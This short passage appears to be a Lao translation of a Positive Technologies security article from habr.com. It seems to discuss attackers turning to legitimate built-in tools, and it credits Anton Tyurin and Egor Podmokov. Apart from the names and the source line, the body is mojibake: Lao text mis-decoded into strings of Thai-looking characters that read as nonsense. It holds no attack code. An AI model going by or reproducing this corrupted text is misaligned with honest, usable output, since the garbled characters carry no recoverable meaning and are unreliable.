(เบกเบตเปเบฅเปเบงเบเบฐเบกเบฒเบเบซเบเบถเปเบเบเบฑเบเบเบญเบเปเบเบปเบฒเปเบเบปเปเบฒเปเบเบเบฑเบเบเบธเบเบฑเบ). เบเปเบฒเบญเปเบฝเบเบเบณเบฅเบฑเบเปเบเปเบฎเบฑเบเบเบงเบฒเบกเบเบดเบเบปเบกเบญเบฑเบเปเบเบทเปเบญเบเบกเบฒเบเบฒเบเบเบงเบฒเบกเบฅเบฝเบเบเปเบฒเบเบเบญเบเบกเบฑเบ: เบเบนเปเปเบเบกเบเบตเบเปเปเบเปเบญเบเบเบฒเบเปเบเบทเปเบญเบเบกเบทเบเบญเบเบเบฒเบเบชเปเบงเบเบเบตเบชเบฒเบกเปเบฅเปเบง; เบเบงเบเปเบฎเบปเบฒเบชเบธเบกเปเบชเปเบเบฒเบเบชเบถเบเบชเบฒเบเบฒเบเบชเบทเปเบชเบฒเบเปเบเบทเบญเบเปเบฒเบ: เปเบเปเบฅเบฐเปเบเบทเปเบญเบเบกเบทเบเบตเปเบญเบฐเบเบดเบเบฒเบเบเปเบฒเบเปเบเบดเบเบเบตเปเบเปเบญเบเปเบซเปเบฎเปเบญเบเบฎเบญเบเบเบญเบเบเบปเบเปเบญเบเปเบเบเบฒเบเบเบฐเบฅเบฒเบเบญเบเปเบเบทเบญเบเปเบฒเบ; เบเบฒเบเบชเบถเบเบชเบฒเบฅเบฒเบเบฅเบฐเบญเบฝเบเบเบญเบเบเบงเบเปเบเบปเบฒเบญเบฐเบเบธเบเบฒเบเปเบซเปเบเบงเบเปเบฎเบปเบฒเบชเบญเบเบเบฐเบฅเบดเบเบเบฐเบเบฑเบเบเบญเบเบเบงเบเปเบฎเบปเบฒ
เบเบนเปเบเบฝเบ:
- Anton Tyurin, เบซเบปเบงเบซเบเปเบฒเบเบฐเปเบเบเบเปเบฅเบดเบเบฒเบเบเบนเปเบเปเบฝเบงเบเบฒเบ, PT Expert Security Center, เปเบเบฑเบเปเบเปเบฅเบขเบตเปเบเบเบฒเบเบเบงเบ
- Egor Podmokov, เบเบนเปเบเปเบฝเบงเบเบฒเบ, เบชเบนเบเบเบงเบฒเบกเบเบญเบเปเบเบเบนเปเบเปเบฝเบงเบเบฒเบ PT, เปเบเบฑเบเปเบเปเบฅเบขเบตเปเบเบเบฒเบเบเบงเบ
เปเบซเบผเปเบเบเปเปเบกเบนเบ: www.habr.com